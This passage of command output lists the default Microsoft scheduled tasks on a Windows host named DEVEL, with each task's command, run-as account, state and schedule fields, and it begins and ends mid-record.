Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\mcupdate
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\mcupdate $(Arg0)
Start In:                             N/A
Comment:                              Check for Media Center updates.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode
Run As User:                          NETWORK SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\MediaCenterRecoveryTask
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          Multiple actions
Start In:                             Multiple actions
Comment:                              Perform Media Center Recovery activities
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\ObjectStoreRecoveryTask
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          Multiple actions
Start In:                             Multiple actions
Comment:                              Perform Object Store Recovery activities
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          NETWORK SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\OCURActivate
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /OCURActivate
Start In:                             N/A
Comment:                              Privileged Media Center OCUR activation job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\OCURDiscovery
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /OCURDiscovery $(Arg0)
Start In:                             N/A
Comment:                              Privileged Media Center OCUR discovery job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\PBDADiscovery
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /PBDADiscovery
Start In:                             N/A
Comment:                              Privileged Media Center OCUR discovery job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\PBDADiscoveryW1
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /wait:7 /PBDADiscovery
Start In:                             N/A
Comment:                              Privileged Media Center OCUR discovery job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 01:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\PBDADiscoveryW2
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /wait:90 /PBDADiscovery
Start In:                             N/A
Comment:                              Privileged Media Center OCUR discovery job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 01:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\PeriodicScanRetry
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %windir%\ehome\MCUpdate.exe -pscn 0
Start In:                             N/A
Comment:                              Background periodic scanner - PeriodicScanRetry
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          NETWORK SERVICE
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        One Time Only
Start Time:                           5:33:00
Start Date:                           9/9/2006
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\PvrRecoveryTask
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          Multiple actions
Start In:                             Multiple actions
Comment:                              Perform Pvr Recovery activities
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          NETWORK SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\PvrScheduleTask
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          Multiple actions
Start In:                             Multiple actions
Comment:                              Perform PVR Scheduling activities
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          NETWORK SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\RecordingRestart
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehrec /RestartRecording
Start In:                             N/A
Comment:                              Restarts recordings after a power failure.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode
Run As User:                          NETWORK SERVICE
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At system start up
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\RegisterSearch
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /DoRegisterSearch $(Arg0)
Start In:                             N/A
Comment:                              Privileged Media Center Search registration job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\ReindexSearchRoot
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /DoReindexSearchRoot
Start In:                             N/A
Comment:                              Privileged Media Center Search Reindexing job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\SqlLiteRecoveryTask
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          Multiple actions
Start In:                             Multiple actions
Comment:                              Perform Data Recovery activities
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          NETWORK SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\UpdateRecordPath
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /DoUpdateRecordPath $(Arg0)
Start In:                             N/A
Comment:                              Privileged Media Center Recorder Permission setting job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\MemoryDiagnostic
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\MemoryDiagnostic\CorruptionDetector
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Task for launching the Memory Diagnostic
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        When an event occurs
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\MemoryDiagnostic\DecompressionFailureDetector
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Task for launching the Memory Diagnostic
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        When an event occurs
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\MobilePC
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\MobilePC\HotStart
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        28/12/2017 2:44:24
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Launches applications configured for Windows HotStart
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Authenticated Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\MUI
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\MUI\LPRemove
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        13/9/2019 6:16:07
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\lpremove.exe
Start In:                             N/A
Comment:                              Launch language cleanup tool
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 10 minutes, If Not Idle Retry For 10 minutes Stop the task if Idle State end
Power Management:                     No Start On Batteries
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 09:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At system start up
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Multimedia
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Multimedia\SystemSoundsService
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        28/12/2017 2:44:24
Last Result:                          0
Author:                               N/A
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              System Sounds User Mode Agent
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\NetTrace
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\NetTrace\GatherNetworkInfo
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft
Task To Run:                          %windir%\system32\gatherNetworkInfo.vbs
Start In:                             $(Arg1)
Comment:                              Network information collector
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode
Run As User:                          Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Offline Files
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Offline Files\Background Synchronization
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              This task controls periodic background synchronization of Offline Files when the user is working in an offline mode.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Authenticated Users
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 24:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        One Time Only, Hourly
Start Time:                           12:00:00
Start Date:                           1/1/2008
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        6 Hour(s), 0 Minute(s)
Repeat: Until: Time:                  None
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Offline Files\Logon Synchronization
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              This task initiates synchronization of Offline Files when a user logs onto the system.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          Authenticated Users
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 24:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\PLA
INFO: There are no scheduled tasks presently available at your access level.

Folder: \Microsoft\Windows\Power Efficiency Diagnostics
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem
Next Run Time:                        24/9/2019 7:25:41
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        13/9/2019 6:10:36
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %SystemRoot%\System32\powercfg.exe -energy -auto
Start In:                             N/A
Comment:                              This job analyzes the system looking for conditions that may cause high energy use.
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 5 minutes, If Not Idle Retry For 120 minutes
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 00:05:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Daily
Start Time:                           6:00:00
Start Date:                           1/1/2008
End Date:                             N/A
Days:                                 Every 14 day(s)
Months:                               N/A
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

Folder: \Microsoft\Windows\RAC
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\RAC\RacTask
Next Run Time:                        14/9/2019 3:12:49
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        14/9/2019 1:08:36
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Microsoft Reliability Analysis task to process system reliability data.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        When an event occurs
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\RAC\RacTask
Next Run Time:                        14/9/2019 3:07:44
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        14/9/2019 1:08:36
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Microsoft Reliability Analysis task to process system reliability data.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        One Time Only, Hourly
Start Time:                           12:00:00
Start Date:                           31/3/2008
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        1 Hour(s), 0 Minute(s)
Repeat: Until: Time:                  None
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

Folder: \Microsoft\Windows\Shell
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Shell\WindowsParentalControls
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Notifications for actions taken by Windows Parental Controls.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Authenticated Users
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Shell\WindowsParentalControlsMigration
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        14/7/2009 7:54:03
Last Result:                          0
Author:                               Microsoft
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Migration for Windows Parental Controls.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\SideShow
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\SideShow\AutoWake
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              This task automatically wakes the computer and then puts it to sleep when automatic wake is turned on for a Windows SideShow-compatible device.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\SideShow\GadgetManager
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              This task manages and synchronizes metadata for the installed gadgets on a Windows SideShow-compatible device.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\SideShow\SessionAgent
Next Run Time:                        Disabled
Status:                               Could not start
Logon Mode:                           Interactive/Background
Last Run Time:                        17/3/2017 4:17:56
Last Result:                          -2147023729
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              This task manages the session behavior when multiple user accounts exist on a Windows SideShow-compatible device.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\SideShow\SystemDataProviders
Next Run Time:                        Disabled
Status:                               Could not start
Logon Mode:                           Interactive/Background
Last Run Time:                        17/3/2017 4:18:11
Last Result:                          -2147023729
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              This task provides system data for the clock, power source, wireless network strength, and volume on a Windows SideShow-compatible device.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\SystemRestore
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\SystemRestore\SR
Next Run Time:                        15/9/2019 12:00:00
Status:                               Ready
Logon Mode:                           Interactive/Background
